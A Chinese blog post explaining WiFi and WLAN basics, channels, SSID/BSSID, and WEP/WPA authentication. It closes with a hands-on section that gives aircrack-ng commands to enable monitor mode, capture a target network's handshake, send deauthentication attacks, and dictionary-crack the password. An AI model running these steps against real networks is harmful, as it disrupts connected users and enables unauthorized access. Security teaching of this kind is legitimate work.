物联网安全之WIFI协议

简介: 物联网安全之WIFI协议

wifi是什么?

无线协议,手机上的无线技术,也叫做WIFI或是WLAN功能。WIFI全称Wireless Fidelity,又称802.11b标准,它的最大优点就是传输速度较高,可以达到11Mbps,另外它的有效距离也很长,同时也与已有的各种802.11DSSS设备兼容。Wi-Fi 无线保真技术与蓝牙技术一样,同属于在办公室和家庭中使用的短距离无线技术。该技术使用的是2.4GHz附近的频段,该频段尚属没用许可的无线频段。其可使用的标准有两个,分别是IEEE802.11a和IEEE802.11b。IEEE802.11g是802.11b的继任者,在802.11b所使用的相同的2.4GHz频段上提供了最高54Mbps的数据传输率

wlan

WLAN是Wireless Local Area Network的简称,指应用无线通信技术将计算机设备互联起来,构成可以互相通信和实现资源共享的网络体系。无线局域网本质的特点是不再使用通信电缆将计算机与网络连接起来,而是通过无线的方式连接,从而使网络的构建和终端的移动更加灵活。
它是相当便利的数据传输系统,它利用射频(Radio Frequency;RF)的技术,使用电磁波,取代旧式碍手碍脚的双绞铜线(Coaxial)所构成的局域网络,在空中进行通信连接,使得无线局域网络能利用简单的存取架构让用户透过它,达到“信息随身化、便利走天下”的理想境界。

Wifi 与 网线

1、通信方面的区别

无线网络通信双方因为是通过无线进行通信,所以通信之前需要建立连接;而有线网络就直接用线缆连接,不用这个过程了。通信双方通信方式是半双工的通信方式;而有线网络可以是全双工。通信时无线网络在网络层以下出错的概率非常高,所以帧的重传概率很大;而有线网络出错概率非常小。

2、性能方面的区别

有线网络提供卓越的性能。无线网络连接仅提供10Mbps带宽,相反100Mbps有线网络虽然成本稍高,但很容易获得。

3、安全方面的区别

无线网络不如有线网络安全。这是因为无线通信信号在空中传播并且可以被拦截。

wifi频谱划分

2.4GHz的wifi,有14个频谱,其中1 6 11 互不干扰。什么意思?比如一套房里,有客厅,主卧,次卧,分别装了三个路由器,三个电磁波都会受到干扰,上网卡,此时分别设置无线信道为1 6 11,在使用就不会产生卡顿了。

640.png

SSID&BSSID

1)基本服务集(BSS)

基本服务集是802.11 LAN的基本组成模块。能互相进行无线通信的STA可以组成一个BSS(Basic Service Set) 。如果一个站移出BSS的覆盖范围,它将不能再与BSS的其它成员通信。

2)扩展服务集(ESS)

多个BSS可以构成一个扩展网络,称为扩展服务集(ESS)网络,一个ESS网络内部的STA可以互相通信,是采用相同的SSID的多个BSS形成的更大规模的虚拟BSS。连接BSS的组件称为分布式系统(Distribution System,DS)。

SSID是服务集的标识,在同一SS内的所有STA和AP必须具有相同的SSID,否则无法进行通信。

SSID是一个ESS的网络标识(路由器的名称,可自己设置)

BSSID是AP的MAC地址,用来标识AP管理的BSS(路由器的mac地址,无法更改)

无线接入过程三个阶段

STA(工作站)启动初始化、开始正式使用AP传送数据帧前,要经过三个阶段才能够接入(802.11MAC层负责客户端与AP之间的通讯,功能包括扫描、接入、认证、加密、漫游和同步等功能):

1)扫描阶段(SCAN)

2)认证阶段 (Authentication)

3)关联(Association)


认证连接方式

无认证(免费wifi)

有认证

ssid-密码认证

wep

wpa/wpa2

wps

wep

WEP是Wired Equivalent Privacy的简称,有线等效保密(WEP)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出 WEP 好几个弱点,因此在2003年被 Wi-Fi Protected Access (WPA) 淘汰,又在2004年由完整的 IEEE 802.11i 标准(又称为 WPA2)所取代。WEP 虽然有些弱点,但也足以吓阻非专业人士的窥探了。

wpa/wpa2

WPA全名为Wi-Fi Protected Access,有WPA、WPA2和WPA3三个标准,是一种保护无线电脑网络(Wi-Fi)安全的系统,它是应研究者在前一代的系统有线等效加密(WEP)中找到的几个严重的弱点而产生的。WPA实作了IEEE 802.11i标准的大部分,是在802.11i完备之前替代WEP的过渡方案。WPA的设计可以用在所有的无线网卡上,但未必能用在第一代的无线取用点上。WPA2具备完整的标准体系,但其不能被应用在某些老旧型号的网卡上。

wpa握手流程

640.png

实战演练爆破wifi密码

需购买无线网卡免驱usb

iwconfig 查看无线网卡状态

airmon-ng check kill 关闭占有网卡的进程

激活网卡,需记住下面的网卡名字

airmon-ng start wlxxxxx

查看当前有哪些WIFI

airodump-ng wlan0mon

针对某个wifi流量抓取

    airodump-ng -c 11 --bssid 30:D3:86:E2:40:D0  -w 207 wlan0mon
    c: 指定它的信道
    bssid: mac地址
    w: 任意文件名称,用来保存流量

    选择一个连接的wifi,进行流量攻击

      aireplay-ng -0 40  -a 30:D3:86:E2:40:D0 wlan0mon
      0: 发送攻击次数
      a: mac地址

      爆破cap流量中的密码

        aircrack-ng -w pass.txt 207-01.cap


        相关实践学习
        钉钉群中如何接收IoT温控器数据告警通知
        本实验主要介绍如何将温控器设备以MQTT协议接入IoT物联网平台,通过云产品流转到函数计算FC,调用钉钉群机器人API,实时推送温湿度消息到钉钉群。
        阿里云AIoT物联网开发实战
        本课程将由物联网专家带你熟悉阿里云AIoT物联网领域全套云产品,7天轻松搭建基于Arduino的端到端物联网场景应用。 开始学习前,请先开通下方两个云产品,让学习更流畅: IoT物联网平台:https://iot.console.aliyun.com/ LinkWAN物联网络管理平台:https://linkwan.console.aliyun.com/service-open
        相关文章
        |
        24天前
        |
        安全 物联网 网络安全
        智能设备的安全隐患:物联网(IoT)安全指南
        智能设备的安全隐患:物联网(IoT)安全指南
        67 12
        |
        22天前
        |
        传感器 消息中间件 物联网
        常用的物联网协议
        常用的物联网协议包括:MQTT(消息队列遥测传输)、CoAP(受限应用协议)、HTTP/HTTPS、LWM2M(轻量级机器对机器)和Zigbee等。这些协议在不同的应用场景中发挥着重要作用,如数据传输、设备管理等。
        |
        1月前
        |
        安全 物联网 物联网安全
        智能物联网安全:物联网设备的防护策略与最佳实践
        【10月更文挑战第26天】随着物联网(IoT)技术的快速发展,智能设备已广泛应用于智能家居、工业控制和智慧城市等领域。然而,设备数量的激增也带来了严重的安全问题,如黑客攻击、数据泄露和恶意控制,对个人隐私、企业运营和国家安全构成威胁。因此,加强物联网设备的安全防护至关重要。
        63 7
        |
        2月前
        |
        网络协议 物联网 网络性能优化
        物联网协议比较 MQTT CoAP RESTful/HTTP XMPP
        【10月更文挑战第18天】本文介绍了物联网领域中四种主要的通信协议:MQTT、CoAP、RESTful/HTTP和XMPP,分别从其特点、应用场景及优缺点进行了详细对比,并提供了简单的示例代码。适合开发者根据具体需求选择合适的协议。
        61 5
        |
        19天前
        |
        消息中间件 监控 物联网
        物联网8大协议介绍及对比
        根据具体的应用需求,选择合适的协议可以大幅提升系统的性能和可靠性。希望本文能为您在物联网协议的选择和应用中提供有价值的参考。
        91 0
        |
        1月前
        |
        安全 物联网 物联网安全
        智能物联网安全:物联网设备的防护策略与最佳实践
        【10月更文挑战第27天】随着物联网技术的快速发展,智能设备已广泛应用于生活和工业领域。然而,物联网设备的安全问题日益凸显,主要威胁包括中间人攻击、DDoS攻击和恶意软件植入。本文探讨了物联网设备的安全防护策略和最佳实践,包括设备认证和加密、定期更新、网络隔离以及安全标准的制定与实施,旨在确保设备安全和数据保护。
        46 0
        |
        2月前
        |
        安全 物联网 物联网安全
        探索未来网络:物联网安全的最佳实践
        随着物联网设备的普及,我们的世界变得越来越互联。然而,这也带来了新的安全挑战。本文将探讨在设计、实施和维护物联网系统时,如何遵循一些最佳实践来确保其安全性。通过深入分析各种案例和策略,我们将揭示如何保护物联网设备免受潜在威胁,同时保持其高效运行。
        54 5
        |
        3月前
        |
        机器学习/深度学习 安全 物联网安全
        探索未来网络:物联网安全的最佳实践与创新策略
        本文旨在深入探讨物联网(IoT)的安全性问题,分析其面临的主要威胁与挑战,并提出一系列创新性的解决策略。通过技术解析、案例研究与前瞻展望,本文不仅揭示了物联网安全的复杂性,还展示了如何通过综合手段提升设备、数据及网络的安全性。我们强调了跨学科合作的重要性,以及在快速发展的技术环境中保持敏捷与适应性的必要性,为业界和研究者提供了宝贵的参考与启示。
        |
        3月前
        |
        存储 安全 物联网
        探索未来网络:物联网安全的挑战与对策
        本文深入探讨了物联网(IoT)技术的基本概念、发展现状以及面临的主要安全挑战,并提出了相应的解决策略。通过对当前物联网设备的安全漏洞和攻击手段的分析,文章强调了加强设备认证、数据加密和隐私保护等措施的重要性。同时,呼吁业界共同努力,制定统一的安全标准和规范,以促进物联网技术的健康发展。
        |
        2月前
        |
        存储 安全 物联网

        相关产品

      • 物联网平台